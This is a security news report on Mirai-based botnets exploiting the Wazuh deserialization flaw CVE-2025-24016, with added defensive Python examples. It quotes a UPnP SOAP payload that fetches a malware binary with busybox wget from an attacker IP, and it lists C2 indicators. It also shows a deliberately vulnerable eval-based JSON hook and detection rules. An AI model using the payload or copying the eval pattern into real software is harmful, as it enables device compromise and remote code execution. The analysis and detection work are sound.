The Security Intelligence and Response Team (SIRT) at Akamai has found that multiple Mirai-based botnets are exploiting CVE-2025-24016, a critical RCE vulnerability in Wazuh servers. This flaw, which has a CVSS score of 9.9, allows remote attackers to execute arbitrary Python code through unsanitized JSON inputs in the Wazuh Distributed API.
“This is the first reported active exploitation of this vulnerability since the initial disclosure in February 2025,” Akamai wrote in its report.
Disclosed in February 2025, CVE-2025-24016 affects Wazuh versions 4.4.0 to 4.9.0, allowing RCE via a malicious run_as request at the /security/user/authenticate/run_as endpoint.
The flaw in Wazuh is linked to the as_Wazuh_object() deserialization method in Python, which does not properly sanitize dictionary inputs.
“This can be exploited by injecting an unsanitized dictionary into DAPI requests, which can lead to evaluation of arbitrary Python code,” the report explains.
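To make the deserialization weakness concrete, the following is an added illustration (not Wazuh's code, and not from the Akamai report) of the pattern described above: a JSON object hook that evaluates a class name taken from the input, shown beside a hardened form that resolves the name against an explicit allowlist and validates the arguments. The marker key `__unhandled_exc__`, the field names and the hook shape are assumptions made for this example.

```python
import json

# Assumed marker key that tells the deserializer "this dict carries an exception".
EXCEPTION_KEY = "__unhandled_exc__"


def vulnerable_hook(dct):
    """Vulnerable pattern: the class name string from the JSON reaches eval().

    Whoever controls the JSON therefore controls which Python expression runs.
    Kept here only for contrast with hardened_hook below."""
    if EXCEPTION_KEY in dct:
        exc = dct[EXCEPTION_KEY]
        return eval(exc["__class__"])(*exc.get("__args__", []))
    return dct


# Hardened form: never evaluate input. Only exception types named in this
# allowlist may be rebuilt, and their arguments must be plain JSON scalars.
ALLOWED_EXCEPTIONS = {
    "ValueError": ValueError,
    "KeyError": KeyError,
    "TimeoutError": TimeoutError,
}
SCALARS = (str, int, float, bool, type(None))


def hardened_hook(dct):
    if EXCEPTION_KEY in dct:
        exc = dct[EXCEPTION_KEY]
        name = exc.get("__class__")
        cls = ALLOWED_EXCEPTIONS.get(name)
        if cls is None:
            raise ValueError(f"refusing to deserialize exception type {name!r}")
        args = exc.get("__args__", [])
        if not isinstance(args, list) or not all(isinstance(a, SCALARS) for a in args):
            raise ValueError("exception args must be a list of JSON scalars")
        return cls(*args)
    return dct


def loads_vulnerable(raw):
    return json.loads(raw, object_hook=vulnerable_hook)


def loads_hardened(raw):
    return json.loads(raw, object_hook=hardened_hook)


# Constructed sample messages (not real traffic).
LEGIT = json.dumps({EXCEPTION_KEY: {"__class__": "ValueError", "__args__": ["bad token"]}})
# A name that is not an exception at all; the vulnerable hook still evaluates it.
NOT_AN_EXCEPTION = json.dumps({EXCEPTION_KEY: {"__class__": "list", "__args__": []}})


def demo():
    """Run both hooks over the samples and report what each produced."""
    results = {"legit": type(loads_hardened(LEGIT)).__name__}
    try:
        loads_hardened(NOT_AN_EXCEPTION)
        results["rejected"] = False
    except ValueError:
        results["rejected"] = True
    # The vulnerable hook builds a list here, proof that it evaluates whatever
    # name the input supplies rather than a fixed set of exception types.
    results["vulnerable_built"] = type(loads_vulnerable(NOT_AN_EXCEPTION)).__name__
    return results


if __name__ == "__main__":
    print(demo())
```

The point of the hardened hook is that the input selects from a closed set of types rather than naming code to run; the same allowlist idea applies whether the marker key is for exceptions, callables or any other object the protocol has to carry across a serialization boundary.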
Akamai discovered two unique botnet campaigns exploiting this vulnerability, both based on Mirai malware.
The first wave appeared in early March 2025, shortly after public disclosure of the CVE, targeting IoT devices with a suite of architecture-specific binaries. The malware, dubbed “morte,” is part of the LZRD Mirai family, known for its console string “lzrd here”.
“The exploit fetches and executes a malicious shell script that serves as a downloader for the main Mirai malware payload,” the report explains.
Associated infrastructure includes:
C2 Domain: nuklearcnc.duckdns[.]org
Payload server: 176.65.134[.]62
Additional domains: cbot.galaxias[.]cc, neon.galaxias[.]cc, pangacnc[.]com
In May 2025, Akamai observed a second botnet dubbed “Resbot” exploiting the same vulnerability but using Italian-styled domain names like gestisciweb.com, suggesting targeting of Italian-speaking users.
The malware, “resgod”, prints the console string “Resentual got you!” upon execution and also targets multiple CPU architectures. Its C2 is hardcoded to 104.168.101[.]27 over TCP port 62627.
“It was using a variety of domains to spread the malware that all had Italian nomenclature… possibly alluding to the targeted geography or language spoken by the affected device owner,” the report notes.
In addition to CVE-2025-24016, the botnets were observed chaining exploits from past years, including:
CVE-2023-1389 (TP-Link)
CVE-2017-17215 (Huawei HG532)
CVE-2017-18368 (D-Link)
Exploits targeting Ivanti, UPnP, and YARN APIs
One attack string specifically crafted for UPnP exploitation via SOAP contained this payload:
<NewStatusURL>$(/bin/busybox wget -g 104.168.101[.]27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>
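As an added defensive example (not part of the Akamai report), the matcher below checks constructed proxy/access log lines against the indicators listed above: the C2 and payload hosts, the resgod C2 port, the Wazuh run_as endpoint, and the command substitution inside a UPnP NewStatusURL element. The pipe-separated key=value log format and the sample lines are assumptions made for this example; the indicators, endpoint and payload shape come from the report.

```python
import re


def refang(ioc):
    """Turn a defanged indicator such as 176.65.134[.]62 into its raw form."""
    return ioc.replace("[.]", ".")


# Indicators as published (defanged), refanged once for matching.
C2_HOSTS = {refang(h) for h in (
    "nuklearcnc.duckdns[.]org", "176.65.134[.]62", "cbot.galaxias[.]cc",
    "neon.galaxias[.]cc", "pangacnc[.]com", "104.168.101[.]27", "gestisciweb[.]com",
)}
RESGOD_C2 = (refang("104.168.101[.]27"), 62627)
RUN_AS_PATH = "/security/user/authenticate/run_as"

# Shell command substitution inside NewStatusURL, as in the reported SOAP payload.
UPNP_CMDSUB = re.compile(r"<NewStatusURL>\s*\$\(.*?\)\s*</NewStatusURL>", re.S)
BUSYBOX_FETCH = re.compile(r"/bin/busybox\s+wget\b")


def parse(line):
    """Assumed log format: fields separated by '|', each 'key=value'."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def classify(line):
    """Return the rule names a single log line triggers (empty list if none)."""
    f = parse(line)
    hits = []
    dst = f.get("dst", "")
    try:
        dport = int(f.get("dport", ""))
    except ValueError:
        dport = None
    if dst in C2_HOSTS:
        hits.append("known-c2-or-payload-host")
    if (dst, dport) == RESGOD_C2:
        hits.append("resgod-c2-port")
    # The run_as endpoint is legitimate; this only marks it for review.
    if f.get("method") == "POST" and f.get("path") == RUN_AS_PATH:
        hits.append("wazuh-run-as-request")
    body = f.get("body", "")
    if UPNP_CMDSUB.search(body):
        hits.append("upnp-soap-command-substitution")
    if BUSYBOX_FETCH.search(body):
        hits.append("busybox-wget-downloader")
    return hits


def scan(lines):
    """Return (line number, hits) for every line that triggered a rule."""
    out = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            out.append((n, hits))
    return out


# Constructed sample log (RFC 5737 documentation addresses for the internal hosts).
SAMPLE_LOG = [
    "ts=2025-03-04T02:11:09Z|src=198.51.100.7|dst=wazuh.example.internal|dport=55000|method=POST|path=/security/user/authenticate/run_as|body=-",
    "ts=2025-03-04T02:11:12Z|src=198.51.100.7|dst=176.65.134.62|dport=80|method=GET|path=/|body=-",
    "ts=2025-05-20T19:40:01Z|src=192.0.2.44|dst=192.0.2.10|dport=49152|method=POST|path=/upnp/control|body=<NewStatusURL>$(/bin/busybox wget -g 104.168.101.27 -l /tmp/.kx -r /resgod.mips)</NewStatusURL>",
    "ts=2025-05-20T19:40:05Z|src=192.0.2.10|dst=104.168.101.27|dport=62627|method=-|path=-|body=-",
    "ts=2025-05-20T19:41:00Z|src=192.0.2.11|dst=updates.example.com|dport=443|method=GET|path=/|body=-",
]


if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG):
        print(n, ", ".join(hits))
```

The run_as rule fires on ordinary use of that endpoint, so it is a review signal rather than an alert on its own; it becomes meaningful when the destination is a Wazuh server still on a version in the 4.4.0 to 4.9.0 range, or when the same source then appears in a hit on one of the infrastructure rules.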
These actions underscore a well-resourced and automated offensive campaign to compromise exposed and outdated infrastructure.